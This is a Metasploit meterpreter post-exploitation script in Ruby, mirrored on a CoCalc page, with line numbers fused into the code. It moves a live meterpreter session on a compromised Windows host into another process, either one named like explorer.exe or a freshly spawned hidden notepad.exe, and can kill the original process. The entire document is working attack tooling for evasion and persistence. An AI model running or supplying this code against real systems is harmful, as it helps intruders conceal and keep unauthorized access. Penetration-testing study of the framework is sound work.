CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/scripts/meterpreter/migrate.rb
Views: 1904
##1# WARNING: Metasploit no longer maintains or accepts meterpreter scripts.2# If you'd like to improve this script, please try to port it as a post3# module instead. Thank you.4##5678#9# Simple example script that migrates to a specific process by name.10# This is meant as an illustration.11#121314spawn = false15kill = false16target_pid = nil17target_name = nil1819opts = Rex::Parser::Arguments.new(20"-h" => [ false, "Help menu." ],21"-f" => [ false, "Launch a process and migrate into the new process"],22"-p" => [ true , "PID to migrate to."],23"-k" => [ false, "Kill original process."],24"-n" => [ true, "Migrate into the first process with this executable name (explorer.exe)" ]25)2627opts.parse(args) { |opt, idx, val|28case opt29when "-f"30spawn = true31when "-k"32kill = true33when "-p"34target_pid = val.to_i35when "-n"36target_name = val.to_s37when "-h"38print_line(opts.usage)39raise Rex::Script::Completed40else41print_line(opts.usage)42raise Rex::Script::Completed43end44}4546# Creates a temp notepad.exe to migrate to depending the architecture.47def create_temp_proc()48# Use the system path for executable to run49cmd = "notepad.exe"50# run hidden51proc = client.sys.process.execute(cmd, nil, {'Hidden' => true })52return proc.pid53end5455# In case no option is provided show help56if args.length == 057print_line(opts.usage)58raise Rex::Script::Completed59end6061### Main ###6263if client.platform == 'windows'64server = client.sys.process.open65original_pid = server.pid66print_status("Current server process: #{server.name} (#{server.pid})")6768if spawn69print_status("Spawning notepad.exe process to migrate to")70target_pid = create_temp_proc71end7273if target_name and not target_pid74target_pid = client.sys.process[target_name]75if not target_pid76print_status("Could not identify the process ID for #{target_name}")77raise Rex::Script::Completed78end79end8081begin82print_good("Migrating to #{target_pid}")83client.core.migrate(target_pid)84print_good("Successfully migrated to process #{}")85rescue ::Exception => e86print_error("Could not migrate in to process.")87print_error(e)88end8990if kill91print_status("Killing original process with PID #{original_pid}")92client.sys.process.kill(original_pid)93print_good("Successfully killed process with PID #{original_pid}")94end95end969798